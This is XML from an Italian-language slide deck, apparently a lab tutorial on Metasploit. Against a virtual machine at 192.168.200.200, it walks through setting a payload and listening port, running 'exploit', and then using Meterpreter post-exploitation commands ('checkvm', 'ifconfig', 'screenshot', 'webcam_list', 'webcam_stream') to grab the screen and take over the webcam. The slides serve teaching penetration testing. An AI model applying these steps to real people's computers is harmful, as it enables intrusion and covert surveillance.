              <a:path h="965785" w="8379209">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8379209" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8379209" y="965785"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="965785"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 4" id="4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="9700922" y="2246432"/>
            <a:ext cx="6748358" cy="7848005"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="7848005" w="6748358">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6748359" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6748359" y="7848004"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="7848004"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 5" id="5"/>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6" id="6"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="656871" y="1519555"/>
            <a:ext cx="7388003" cy="71812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Scelto l’exploit, andremo a definire ulteriori dettagli nel suo payload col comando “show options”.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3399">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HK Grotesk"/>
              </a:rPr>
              <a:t>Andiamo quindi a definire l’IP della macchina vittima e la porta da cui ci metteremo in ascolto.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3399">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HK Grotesk"/>
              </a:rPr>
              <a:t>In questo caso, l’IP della macchina vittima è 192.168.200.200, mentre la porta da cui ci metteremo in ascolto sarà la 7777.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 7" id="7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="9908237" y="5436436"/>
            <a:ext cx="6400078" cy="353360"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1777549" cy="98142"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 8" id="8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="1777549" cy="98142"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="98142" w="1777549">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1777549" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1777549" y="98142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="98142"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="000000">
                <a:alpha val="0"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln w="38100" cap="sq">
              <a:solidFill>
                <a:srgbClr val="FF3131"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 9" id="9"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="19050"/>
              <a:ext cx="1777549" cy="79092"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr" rtlCol="false" tIns="50800" lIns="50800" bIns="50800" rIns="50800"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="2664"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 10" id="10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="9875063" y="9710559"/>
            <a:ext cx="5249430" cy="267491"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1457970" cy="74293"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 11" id="11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="1457970" cy="74293"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="74293" w="1457970">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1457970" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1457970" y="74293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="74293"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="000000">
                <a:alpha val="0"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln w="38100" cap="sq">
              <a:solidFill>
                <a:srgbClr val="FF3131"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 12" id="12"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="19050"/>
              <a:ext cx="1457970" cy="55243"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr" rtlCol="false" tIns="50800" lIns="50800" bIns="50800" rIns="50800"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="2664"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:gr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144000" y="1692104"/>
            <a:ext cx="8691818" cy="6902792"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="6902792" w="8691818">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8691818" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8691818" y="6902792"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6902792"/>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5" id="5"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="742740" y="2419667"/>
            <a:ext cx="7388003" cy="538099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Impostato il payload, possiamo passare all’attacco effettivo col comando “exploit”.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3399">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HK Grotesk"/>
              </a:rPr>
              <a:t>Iniziata la connessione alla macchina vittima, potremo utilizzare il comando “help” per capire quali funzioni di Meterpreter e dell’exploit selezionato possiamo utilizzare.</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482584" y="4230577"/>
            <a:ext cx="9512815" cy="1825847"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="1825847" w="9512815">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9512815" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9512815" y="1825846"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1825846"/>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5" id="5"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="502306" y="2719705"/>
            <a:ext cx="7388003" cy="47809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Anzitutto, cerchiamo di capire se abbiamo a che fare con una Macchina Virtuale o meno.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3399">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HK Grotesk"/>
              </a:rPr>
              <a:t>Il comando “run checkvm” ci aiuterà in tal senso: infatti, gli stessi risultati ci dicono che abbiamo a che fare con una Macchina Virtuale.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 6" id="6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="8482584" y="5419262"/>
            <a:ext cx="4900474" cy="353360"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1361051" cy="98142"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 7" id="7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="1361051" cy="98142"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="98142" w="1361051">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1361051" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1361051" y="98142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="98142"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="000000">
                <a:alpha val="0"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln w="38100" cap="sq">
              <a:solidFill>
                <a:srgbClr val="FF3131"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 8" id="8"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="19050"/>
              <a:ext cx="1361051" cy="79092"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr" rtlCol="false" tIns="50800" lIns="50800" bIns="50800" rIns="50800"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="2664"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:gr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144000" y="2209761"/>
            <a:ext cx="8737440" cy="5867478"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="5867478" w="8737440">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8737440" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8737440" y="5867478"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5867478"/>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5" id="5"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="588176" y="3019742"/>
            <a:ext cx="7388003" cy="418084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Dopo aver attestato che la nostra vittima è una macchina virtuale, siamo interessati anche alle sue impostazioni di rete.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3399">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HK Grotesk"/>
              </a:rPr>
              <a:t>Col comando “ifconfig” potremo avere  accesso anche a queste informazioni.</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771279" y="1612428"/>
            <a:ext cx="8967158" cy="1182034"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="1182034" w="8967158">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8967158" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8967158" y="1182034"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1182034"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 4" id="4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="8771279" y="3505262"/>
            <a:ext cx="8967158" cy="5397029"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="5397029" w="8967158">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8967158" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8967158" y="5397029"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5397029"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 5" id="5"/>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6" id="6"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="605350" y="2648646"/>
            <a:ext cx="7388003" cy="538099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Le informazioni sulla rete, però, non ci bastano. Vogliamo anche rubare un’istantanea dello schermo della macchina vittima.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3399">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HK Grotesk"/>
              </a:rPr>
              <a:t>Col comando “screenshot” potremo, per l’appunto, scattare un’istantanea e ritrovarla al percorso indicato da Meterpreter.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 7" id="7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="8771279" y="1612428"/>
            <a:ext cx="4900474" cy="353360"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1361051" cy="98142"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 8" id="8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="1361051" cy="98142"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="98142" w="1361051">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1361051" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1361051" y="98142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="98142"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="000000">
                <a:alpha val="0"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln w="38100" cap="sq">
              <a:solidFill>
                <a:srgbClr val="FF3131"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 9" id="9"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="19050"/>
              <a:ext cx="1361051" cy="79092"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr" rtlCol="false" tIns="50800" lIns="50800" bIns="50800" rIns="50800"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="2664"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 10" id="10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="13383058" y="7311980"/>
            <a:ext cx="1729134" cy="1435313"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="480247" cy="398642"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 11" id="11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="480247" cy="398642"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="398642" w="480247">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="480247" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="480247" y="398642"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="398642"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="000000">
                <a:alpha val="0"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln w="38100" cap="sq">
              <a:solidFill>
                <a:srgbClr val="FF3131"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 12" id="12"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="19050"/>
              <a:ext cx="480247" cy="379592"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr" rtlCol="false" tIns="50800" lIns="50800" bIns="50800" rIns="50800"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="2664"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:gr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101781" y="1161218"/>
            <a:ext cx="6303310" cy="1825087"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="1825087" w="6303310">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6303310" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6303310" y="1825087"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1825087"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 4" id="4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="11101781" y="4670346"/>
            <a:ext cx="6362654" cy="5351920"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="5351920" w="6362654">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6362654" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6362654" y="5351920"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5351920"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 5" id="5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="11101781" y="3343593"/>
            <a:ext cx="6362654" cy="1143518"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="1143518" w="6362654">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6362654" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6362654" y="1143518"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1143518"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId6"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 6" id="6"/>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7" id="7"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1028700" y="619442"/>
            <a:ext cx="7388003" cy="838136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Oltre ad avere chiare informazioni sulla rete e dopo esser riusciti anche a rubare uno screenshot del suo schermo, vogliamo anche verificare la presenza di webcam e, eventualmente, scattare una foto in real time alla nostra vittima.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3399">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HK Grotesk"/>
              </a:rPr>
              <a:t>Col comando “webcam_list” potremo vedere una lista di eventuali webcam collegate al pc vittima e, successivamente, potremo anche prenderne il controllo col comando “webcam_stream”.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639778" y="1959221"/>
            <a:ext cx="8387708" cy="6368558"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="6368558" w="8387708">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8387708" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8387708" y="6368558"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6368558"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 4" id="4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
